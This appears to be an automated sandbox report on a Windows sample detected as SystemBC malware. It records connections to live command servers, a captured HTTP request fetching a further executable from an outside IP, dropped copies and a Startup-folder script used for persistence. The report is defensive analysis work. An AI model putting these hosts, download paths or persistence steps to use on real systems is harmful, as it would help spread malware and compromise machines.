Name    Virtual Address  Virtual Size  Raw Size  MD5                               Xored PE  ZLIB Complexity      File Type  Entropy              Characteristics
.text   0x2000           0xf4544       0xf4600   670da8be7d5f3d4cc8f65acfcd7302fb  False     0.9642273417519182   data       7.965586296497431    IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc   0xf8000          0x600         0x600     051579fd0620727e1c97eacedb4d0f4d  False     0.412109375          data       4.061624946907831    IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc  0xfa000          0xc           0x200     87b3c853d574c5f450a735a369848f5c  False     0.044921875          data       0.10191042566270775  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Name         RVA      Size   Type                                                                               Language  Country  ZLIB Complexity
RT_VERSION   0xf80a0  0x30c  data                                                                                                  0.4230769230769231
RT_MANIFEST  0xf83ac  0x1ea  XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators                     0.5489795918367347

DLL          Import
mscoree.dll  _CorExeMain

Timestamp                            Source Port  Dest Port  Source IP       Dest IP
Dec 16, 2024 13:36:43.822382927 CET  49813        4000       192.168.2.6     78.41.139.3
Dec 16, 2024 13:36:43.942356110 CET  4000         49813      78.41.139.3     192.168.2.6
Dec 16, 2024 13:36:43.942506075 CET  49813        4000       192.168.2.6     78.41.139.3
Dec 16, 2024 13:36:43.942588091 CET  49813        4000       192.168.2.6     78.41.139.3
Dec 16, 2024 13:36:44.062381029 CET  4000         49813      78.41.139.3     192.168.2.6
Dec 16, 2024 13:36:45.186831951 CET  4000         49813      78.41.139.3     192.168.2.6
Dec 16, 2024 13:36:45.186914921 CET  4000         49813      78.41.139.3     192.168.2.6
Dec 16, 2024 13:36:45.187052965 CET  49813        4000       192.168.2.6     78.41.139.3
Dec 16, 2024 13:36:45.193938971 CET  49813        4000       192.168.2.6     78.41.139.3
Dec 16, 2024 13:36:45.195656061 CET  49815        5337       192.168.2.6     78.41.139.3
Dec 16, 2024 13:36:45.313942909 CET  4000         49813      78.41.139.3     192.168.2.6
Dec 16, 2024 13:36:45.315530062 CET  5337         49815      78.41.139.3     192.168.2.6
Dec 16, 2024 13:36:45.315814972 CET  49815        5337       192.168.2.6     78.41.139.3
Dec 16, 2024 13:36:45.316756964 CET  49815        5337       192.168.2.6     78.41.139.3
Dec 16, 2024 13:36:45.436570883 CET  5337         49815      78.41.139.3     192.168.2.6
Dec 16, 2024 13:36:46.559036970 CET  5337         49815      78.41.139.3     192.168.2.6
Dec 16, 2024 13:36:46.601485014 CET  49815        5337       192.168.2.6     78.41.139.3
Dec 16, 2024 13:36:47.104617119 CET  49821        80         192.168.2.6     45.155.249.199
Dec 16, 2024 13:36:47.224658966 CET  80           49821      45.155.249.199  192.168.2.6
Dec 16, 2024 13:36:47.228672981 CET  49821        80         192.168.2.6     45.155.249.199
Dec 16, 2024 13:36:47.229559898 CET  49821        80         192.168.2.6     45.155.249.199
Dec 16, 2024 13:36:47.349409103 CET  80           49821      45.155.249.199  192.168.2.6
Dec 16, 2024 13:36:48.472740889 CET  80           49821      45.155.249.199  192.168.2.6
Dec 16, 2024 13:36:48.472860098 CET  49821        80         192.168.2.6     45.155.249.199
Dec 16, 2024 13:36:53.474456072 CET  80           49821      45.155.249.199  192.168.2.6
Dec 16, 2024 13:36:53.474526882 CET  49821        80         192.168.2.6     45.155.249.199

Timestamp                            Source Port  Dest Port  Source IP    Dest IP
Dec 16, 2024 13:36:43.175157070 CET  52185        53         192.168.2.6  1.1.1.1
Dec 16, 2024 13:36:43.814924955 CET  53           52185      1.1.1.1      192.168.2.6

Timestamp                            Source IP    Dest IP  Trans ID  OP Code             Name                     Type            Class        DNS over HTTPS
Dec 16, 2024 13:36:43.175157070 CET  192.168.2.6  1.1.1.1  0xd9b4    Standard query (0)  wodresomdaymomentum.org  A (IP address)  IN (0x0001)  false

Timestamp                            Source IP  Dest IP      Trans ID  Reply Code    Name                     CName  Address      Type            Class        DNS over HTTPS
Dec 16, 2024 13:36:43.814924955 CET  1.1.1.1    192.168.2.6  0xd9b4    No error (0)  wodresomdaymomentum.org         78.41.139.3  A (IP address)  IN (0x0001)  false

                                            • 45.155.249.199

Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
0           192.168.2.6  49821        45.155.249.199  80                4324  C:\ProgramData\faer\wopbv.exe

Timestamp                            Bytes transferred  Direction  Data
Dec 16, 2024 13:36:47.229559898 CET  127                OUT        GET /files/mailer/blue.exe HTTP/1.1
                                                                   User-Agent: Microsoft Internet Explorer
                                                                   Host: 45.155.249.199
                                                                   Cache-Control: no-cache
Dec 16, 2024 13:36:48.472740889 CET  437                IN         HTTP/1.1 404 Not Found
                                                                   Date: Mon, 16 Dec 2024 12:36:48 GMT
                                                                   Server: Apache/2.4.58 (Ubuntu)
                                                                   Content-Length: 276
                                                                   Content-Type: text/html; charset=iso-8859-1
                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.58 (Ubuntu) Server at 45.155.249.199 Port 80</address></body></html>


                                            Target ID:1
                                            Start time:07:35:54
                                            Start date:16/12/2024
                                            Path:C:\Users\user\Desktop\uC4EETMDcz.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\user\Desktop\uC4EETMDcz.exe"
                                            Imagebase:0x670000
                                            File size:1'032'736 bytes
                                            MD5 hash:01B4E5031BCE630FF9A75984DBCE65E4
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000001.00000002.2396891242.0000000005500000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000001.00000002.2378662559.0000000002AF1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_SystemBC, Description: Yara detected SystemBC, Source: 00000001.00000002.2378662559.0000000002B5F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_SystemBC, Description: Yara detected SystemBC, Source: 00000001.00000002.2378662559.0000000002C7C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            Reputation:low
                                            Has exited:true

                                            Target ID:3
                                            Start time:07:36:17
                                            Start date:16/12/2024
                                            Path:C:\Users\user\Desktop\uC4EETMDcz.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\user\Desktop\uC4EETMDcz.exe"
                                            Imagebase:0xa20000
                                            File size:1'032'736 bytes
                                            MD5 hash:01B4E5031BCE630FF9A75984DBCE65E4
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:low
                                            Has exited:true

                                            Target ID:4
                                            Start time:07:36:19
                                            Start date:16/12/2024
                                            Path:C:\ProgramData\faer\wopbv.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\ProgramData\faer\wopbv.exe
                                            Imagebase:0x3d0000
                                            File size:1'032'736 bytes
                                            MD5 hash:01B4E5031BCE630FF9A75984DBCE65E4
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000004.00000002.2619060689.000000000286A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_SystemBC, Description: Yara detected SystemBC, Source: 00000004.00000002.2619060689.000000000286A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_SystemBC, Description: Yara detected SystemBC, Source: 00000004.00000002.2619060689.000000000297B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            Antivirus matches:
                                            • Detection: 100%, Joe Sandbox ML
                                            • Detection: 58%, ReversingLabs
                                            Reputation:low
                                            Has exited:true

                                            Target ID:6
                                            Start time:07:36:29
                                            Start date:16/12/2024
                                            Path:C:\Windows\System32\wscript.exe
                                            Wow64 process (32bit):false
                                            Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\brokerutil.vbs"
                                            Imagebase:0x7ff741be0000
                                            File size:170'496 bytes
                                            MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            Target ID:7
                                            Start time:07:36:30
                                            Start date:16/12/2024
                                            Path:C:\Users\user\AppData\Local\brokerutil.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\user\AppData\Local\brokerutil.exe"
                                            Imagebase:0x680000
                                            File size:1'032'736 bytes
                                            MD5 hash:01B4E5031BCE630FF9A75984DBCE65E4
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000007.00000002.2726825474.0000000002D31000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_SystemBC, Description: Yara detected SystemBC, Source: 00000007.00000002.2726825474.0000000002D31000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000007.00000002.2744031290.0000000003D31000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_SystemBC, Description: Yara detected SystemBC, Source: 00000007.00000002.2726825474.00000000032CE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            Antivirus matches:
                                            • Detection: 100%, Joe Sandbox ML
                                            • Detection: 58%, ReversingLabs
                                            Reputation:low
                                            Has exited:true

                                            Target ID:8
                                            Start time:07:36:42
                                            Start date:16/12/2024
                                            Path:C:\ProgramData\faer\wopbv.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\ProgramData\faer\wopbv.exe"
                                            Imagebase:0xb60000
                                            File size:1'032'736 bytes
                                            MD5 hash:01B4E5031BCE630FF9A75984DBCE65E4
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:low
                                            Has exited:false

                                            Target ID:10
                                            Start time:07:36:52
                                            Start date:16/12/2024
                                            Path:C:\Users\user\AppData\Local\brokerutil.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\user\AppData\Local\brokerutil.exe"
                                            Imagebase:0x7ff799c70000
                                            File size:1'032'736 bytes
                                            MD5 hash:01B4E5031BCE630FF9A75984DBCE65E4
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_SystemBC, Description: Yara detected SystemBC, Source: 0000000A.00000002.2724225667.0000000000575000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                            Reputation:low
                                            Has exited:true

                                            Target ID:11
                                            Start time:07:37:01
                                            Start date:16/12/2024
                                            Path:C:\ProgramData\faer\wopbv.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\ProgramData\faer\wopbv.exe
                                            Imagebase:0xc80000
                                            File size:1'032'736 bytes
                                            MD5 hash:01B4E5031BCE630FF9A75984DBCE65E4
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 0000000B.00000002.3039485950.0000000003141000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_SystemBC, Description: Yara detected SystemBC, Source: 0000000B.00000002.3039485950.0000000003141000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_SystemBC, Description: Yara detected SystemBC, Source: 0000000B.00000002.3039485950.0000000003281000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            Reputation:low
                                            Has exited:true

                                            Target ID:12
                                            Start time:07:37:23
                                            Start date:16/12/2024
                                            Path:C:\ProgramData\faer\wopbv.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\ProgramData\faer\wopbv.exe"
                                            Imagebase:0xd70000
                                            File size:1'032'736 bytes
                                            MD5 hash:01B4E5031BCE630FF9A75984DBCE65E4
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:low
                                            Has exited:true

                                              Execution Graph

                                              Execution Coverage:12.4%
                                              Dynamic/Decrypted Code Coverage:99.1%
                                              Signature Coverage:2.7%
                                              Total number of Nodes:339
                                              Total number of Limit Nodes:42
61512 56f7487 61510->61512 61513 557ea68 61514 557eaac VirtualAlloc 61513->61514 61516 557eb19 61514->61516

                                              Control-flow Graph

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.2378372832.0000000000F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F80000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_f80000_uC4EETMDcz.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 2
                                              • API String ID: 0-450215437
                                              • Opcode ID: 3692c2f48253b66831cf0011d76d7a371e5bfac223be9f0e4be238cf9f347bc8
                                              • Instruction ID: 92f31e528d78a34816f566e48cf787c69d3f4e4bead8ebe4b702c6f03fe38dbc
                                              • Opcode Fuzzy Hash: 3692c2f48253b66831cf0011d76d7a371e5bfac223be9f0e4be238cf9f347bc8
                                              • Instruction Fuzzy Hash: 1FE2D274A052288FCB64EF69DC94B9EBBB2FB89300F1081E9D409A7355DB749E85DF40
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.2399489943.0000000005710000.00000040.00000800.00020000.00000000.sdmp, Offset: 05710000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_5710000_uC4EETMDcz.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 4
                                              • API String ID: 0-4088798008
                                              • Opcode ID: b2e9b6265384040c62a422a660c196ec6013ac37d42933bc4587a4dc2f04a90e
                                              • Instruction ID: 03f4f401e1350960d388826e93ca83bc4b8dd14767d0ffcb7e4581db278bc46d
                                              • Opcode Fuzzy Hash: b2e9b6265384040c62a422a660c196ec6013ac37d42933bc4587a4dc2f04a90e
                                              • Instruction Fuzzy Hash: 18B20974A00218CFDB24DFA8D994BADB7B6FF88300F144195E906AB2A5DB70ED41DF54

                                              Control-flow Graph

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.2399439396.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_56f0000_uC4EETMDcz.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 8
                                              • API String ID: 0-4194326291
                                              • Opcode ID: b7aa21d0006ed7e8ab3d5c97a1a5ed31dd56eee3809ca7fb973223c8e3ee5d76
                                              • Instruction ID: 0003728098b31a6b818adccd869744999705e31a5c56121802911458ce7a0e41
                                              • Opcode Fuzzy Hash: b7aa21d0006ed7e8ab3d5c97a1a5ed31dd56eee3809ca7fb973223c8e3ee5d76
                                              • Instruction Fuzzy Hash: F052F775E012298FDB64DF69C894AD9B7B1FF89300F1086EAD909A7345DB70AE81CF50
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.2399489943.0000000005710000.00000040.00000800.00020000.00000000.sdmp, Offset: 05710000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_5710000_uC4EETMDcz.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 4
                                              • API String ID: 0-4088798008
                                              • Opcode ID: 14056fe9c8db29e96e9b9c96482e422df0306e2251bd16078fb3fe9e4973ba5c
                                              • Instruction ID: be9a599db195d9eaf0ba816734f852a89a93eeffbda0db908bd5c1d5ba48c35a
                                              • Opcode Fuzzy Hash: 14056fe9c8db29e96e9b9c96482e422df0306e2251bd16078fb3fe9e4973ba5c
                                              • Instruction Fuzzy Hash: 0022DC74A00218CFDB24DFA8D994BADB7B2FF48304F1481A9D909AB295DB70ED81DF54
                                              APIs
                                              • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 056F7475
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.2399439396.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_56f0000_uC4EETMDcz.jbxd
                                              Similarity
                                              • API ID: MemoryProtectVirtual
                                              • String ID:
                                              • API String ID: 2706961497-0
                                              • Opcode ID: d3eb1787848ff7a74eadc9d261385f80d3bf4f7184720e0cd8ab7194f15eedcc
                                              • Instruction ID: 9ee92bc1432b40c43688849c5da68cd3379e934eb044b4f795b850707319cae6
                                              • Opcode Fuzzy Hash: d3eb1787848ff7a74eadc9d261385f80d3bf4f7184720e0cd8ab7194f15eedcc
                                              • Instruction Fuzzy Hash: 1D4198B9D002589FCF00CFA9D980AEEFBB1BF08320F10952AE918B7250D735A905CF64
                                              APIs
                                              • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 056F7475
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.2399439396.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_56f0000_uC4EETMDcz.jbxd
                                              Similarity
                                              • API ID: MemoryProtectVirtual
                                              • String ID:
                                              • API String ID: 2706961497-0
                                              • Opcode ID: 6e49a386bc3008ec4e1e0404bdeee02fa060683cdf310a2561a8412c991e6d86
                                              • Instruction ID: f5609e56e7af8752e588eddde619964cbff3b63939ba64153d34024bd5572e3a
                                              • Opcode Fuzzy Hash: 6e49a386bc3008ec4e1e0404bdeee02fa060683cdf310a2561a8412c991e6d86
                                              • Instruction Fuzzy Hash: BA4187B5D042589FCF10CFAAD980ADEFBB1BB49310F10A42AE919B7210D775A905CF68
                                              APIs
                                              • NtResumeThread.NTDLL(?,?), ref: 056F9D76
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.2399439396.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_56f0000_uC4EETMDcz.jbxd
                                              Similarity
                                              • API ID: ResumeThread
                                              • String ID:
                                              • API String ID: 947044025-0
                                              • Opcode ID: a16b2615ca5fb426859cf57ac48f06f9ebe436ee2e7dbd6f0f25c30d4e40e5ff
                                              • Instruction ID: e9ef68b8ec3fc72a46519d07e8e62d79913758184583b604076d13c1bfb87f15
                                              • Opcode Fuzzy Hash: a16b2615ca5fb426859cf57ac48f06f9ebe436ee2e7dbd6f0f25c30d4e40e5ff
                                              • Instruction Fuzzy Hash: F631BAB5D012189FDB10CFA9D980AEEFBF1BF49310F24942AE915B7200C775A905CF94
                                              APIs
                                              • NtResumeThread.NTDLL(?,?), ref: 056F9D76
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.2399439396.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_56f0000_uC4EETMDcz.jbxd
                                              Similarity
                                              • API ID: ResumeThread
                                              • String ID:
                                              • API String ID: 947044025-0
                                              • Opcode ID: d055f6e63c33a52e5c8157878b0664a44e7c986ff18fee169b175423b674e111
                                              • Instruction ID: c9862bf11b34648196f4ec95a9c1aa684f2151af1269df3b9fed59845f7454ec
                                              • Opcode Fuzzy Hash: d055f6e63c33a52e5c8157878b0664a44e7c986ff18fee169b175423b674e111
                                              • Instruction Fuzzy Hash: A43199B5D012589FDF10CFAAD984AAEFBF1BB49310F20942AE915B7200C775A905CF94
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.2399439396.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_56f0000_uC4EETMDcz.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: h
                                              • API String ID: 0-2439710439
                                              • Opcode ID: 8474ac7226c7fc09f9bc0322a3dc3206ae7fc7564535c28bef88ca9aa9d77664
                                              • Instruction ID: 19caf9e9666dc0816b4b1680bfd2826fb14bd137188c86fa543be095f79e265c
                                              • Opcode Fuzzy Hash: 8474ac7226c7fc09f9bc0322a3dc3206ae7fc7564535c28bef88ca9aa9d77664
                                              • Instruction Fuzzy Hash: F3710571E006288FDB14DF6ADC50BDAB7B2FF89300F1086AAD509A7354DB746A85CF50
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.2378372832.0000000000F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F80000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_f80000_uC4EETMDcz.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 5be6ffab2593a737b6b926d8e1338f68e69ac1d019a772c5d557b92250add5f1
                                              • Instruction ID: ce0472d32d289ec38c45d29338222105487e61e143cc39b15b00fd073f103782
                                              • Opcode Fuzzy Hash: 5be6ffab2593a737b6b926d8e1338f68e69ac1d019a772c5d557b92250add5f1
                                              • Instruction Fuzzy Hash: 89A2B275A00628CFDB65DF69C984AD9BBB2FF89300F1581E9D509AB321DB319E81DF40
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.2396175651.00000000051A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_51a0000_uC4EETMDcz.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c167e9cbd60fc96513df468a7d04758359f186d8e2949573d662026068a2c2f5
                                              • Instruction ID: 3ed5ac090ca2bebabd1e2fb768c11b5414f07df1e2ba8d4d41e8d974071d3394
                                              • Opcode Fuzzy Hash: c167e9cbd60fc96513df468a7d04758359f186d8e2949573d662026068a2c2f5
                                              • Instruction Fuzzy Hash: B2629AB5B007159FDB19CFA9C498A6EBBF2FF88300F14892AD556D7780DB34A941CB90
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.2378372832.0000000000F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F80000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_f80000_uC4EETMDcz.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: dde39dbf11193773406771b7ac36a58cafd97646c94f024b2ae4814e22f1334c
                                              • Instruction ID: 28efbd6100b68503b3f7be10d881cc64d69cf9823438d6c1faf6b6b2cc9af11f
                                              • Opcode Fuzzy Hash: dde39dbf11193773406771b7ac36a58cafd97646c94f024b2ae4814e22f1334c
                                              • Instruction Fuzzy Hash: 6052B3B4A046288FCB64EF28DC84B9ABBB1FB89301F1081D9D50DA7355DB74AE81DF51
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.2399489943.0000000005710000.00000040.00000800.00020000.00000000.sdmp, Offset: 05710000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_5710000_uC4EETMDcz.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: bddaeaa2f770ea92c84ce0a029ea162b1bba67df7477cbb2af47d2cdce374c16
                                              • Instruction ID: a3a98ecf9fea515c0e6397a013c658332e4ae8f6c033048170eddd9218821d57
                                              • Opcode Fuzzy Hash: bddaeaa2f770ea92c84ce0a029ea162b1bba67df7477cbb2af47d2cdce374c16
                                              • Instruction Fuzzy Hash: 3D120670A05228CFDB24DF6DD884BAEB7B2FB49300F1081A9D80AA7355DB749E85DF15
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.2399489943.0000000005710000.00000040.00000800.00020000.00000000.sdmp, Offset: 05710000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_5710000_uC4EETMDcz.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 586ba87a2a882e9e5c56ca515c48a9d4f363f340ca9d58d0d89efe2e6bd9a7fb
                                              • Instruction ID: 80f8139744e96890936ba9d9731035355e6b7875e467778628a988992e5aed20
                                              • Opcode Fuzzy Hash: 586ba87a2a882e9e5c56ca515c48a9d4f363f340ca9d58d0d89efe2e6bd9a7fb
                                              • Instruction Fuzzy Hash: 07120770E05228CFDB24DF69D884BAEB7B2FB49300F1081A9D80AA7355DB749E85DF15
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.2378372832.0000000000F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F80000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_f80000_uC4EETMDcz.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 5da76d468996f3bc9d8082879b4e085d82fb8a5afbc2b3b6820a80eca836a6f7
                                              • Instruction ID: c35994571e2cdcd377535faf431a11d10297a9231c387ae9b3f4288e2e6e4a6f
                                              • Opcode Fuzzy Hash: 5da76d468996f3bc9d8082879b4e085d82fb8a5afbc2b3b6820a80eca836a6f7
                                              • Instruction Fuzzy Hash: DDE10232E09209CFCB51EFA8C890BEDBBB1FF95300F15856AD406AB252D734B945EB51
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.2399639540.0000000005810000.00000040.00000800.00020000.00000000.sdmp, Offset: 05810000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_5810000_uC4EETMDcz.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: b7e0ba99cfb7dd40fc02edfb82c05b173f5b4b19b0d31d1fa8fe18c7c981f088
                                              • Instruction ID: f5a5a17512e16c6250f7c5870c9ede4dada1a2d1b305d4b54f73d5ed3f91c2ce
                                              • Opcode Fuzzy Hash: b7e0ba99cfb7dd40fc02edfb82c05b173f5b4b19b0d31d1fa8fe18c7c981f088
                                              • Instruction Fuzzy Hash: A2D1C074E01219CFDB54DFA9D994A9EBBB2FF88300F1081A9D409AB365DB31AD81CF50
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.2396175651.00000000051A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_51a0000_uC4EETMDcz.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 53557576225229a2594136bd02d77a1f0f4c5c1fad1e88383fe58a6aaa7e7e31
                                              • Instruction ID: 7564c8be547bfcf3464c9625e340cdf75fb0aed749961566be5ce292aafbeb39
                                              • Opcode Fuzzy Hash: 53557576225229a2594136bd02d77a1f0f4c5c1fad1e88383fe58a6aaa7e7e31
                                              • Instruction Fuzzy Hash: 26C13A78E05218CFDB25DFA9C984BAEBBF6FF89300F1182A9D409A7245DB745985CF01
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.2395215825.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_4f90000_uC4EETMDcz.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 60ba815c4e13ddbbd75bec2b23d2ca8bfa611026ccc5458f67fdd1033b33065d
                                              • Instruction ID: 3d549b03fa9bbe3612d598a9656dff251e037757b5171d951da318fdaf912012
                                              • Opcode Fuzzy Hash: 60ba815c4e13ddbbd75bec2b23d2ca8bfa611026ccc5458f67fdd1033b33065d
                                              • Instruction Fuzzy Hash: A5B1C374E05218CFEB14DFA9E984BADBBF6FB49304F1081A9D409A7255EB706D86CF01
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.2395215825.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_4f90000_uC4EETMDcz.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d0a1c6af7a7c1b600abf550a9511fc6ecf71d3f7d3f126481b054197e8b998b4
                                              • Instruction ID: 3e7b70361eff30c01beee8b3f5d2e695df9226292c7cbdd3352eefc4eb720e9f
                                              • Opcode Fuzzy Hash: d0a1c6af7a7c1b600abf550a9511fc6ecf71d3f7d3f126481b054197e8b998b4
                                              • Instruction Fuzzy Hash: 64B1A274E05218CFEB54DFA9E984B9DBBF2FB49304F1081A9D409A7255EB70AD86CF01
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.2399439396.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                              Joe Sandbox IDA Plugin
